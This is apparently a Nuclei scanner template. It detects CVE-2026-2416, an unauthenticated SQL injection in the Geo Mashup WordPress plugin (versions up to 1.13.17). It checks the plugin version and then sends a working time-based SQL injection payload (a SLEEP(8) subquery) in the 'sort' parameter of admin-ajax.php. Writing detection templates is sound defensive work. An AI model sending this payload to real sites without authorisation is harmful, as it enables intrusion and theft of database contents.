id: CVE-2026-2416

info:
  name: Geo Mashup <= 1.13.17 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    Geo Mashup WordPress plugin <= 1.13.17 contains a SQL injection caused by insufficient escaping of the 'sort' parameter, letting unauthenticated attackers extract sensitive database information remotely.
  impact: |
    Unauthenticated attackers can extract sensitive database information, leading to data disclosure and potential further compromise.
  remediation: Update to the latest version beyond 1.13.17.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-mashup/geo-mashup-11317-unauthenticated-sql-injection-via-sort-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2416
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2416
    epss-score: 0.01392
    epss-percentile: 0.68689
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,geo-mashup,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/geo-mashup/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 1.13.17')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin-ajax.php?action=geo_mashup_query&output=json&sort=(SELECT(0)FROM(SELECT(SLEEP(8)))a) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains(body, "objects")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a004730450221009ef6eca5c432a1fe886515d9b707f66aacc553d0ef7d8696806fa693cadad8f3022025d3e5c5ce636f5685074420662906857465e5dd87c42080d4edeff13666dc91:922c64590222798bb761d5b6d8e72950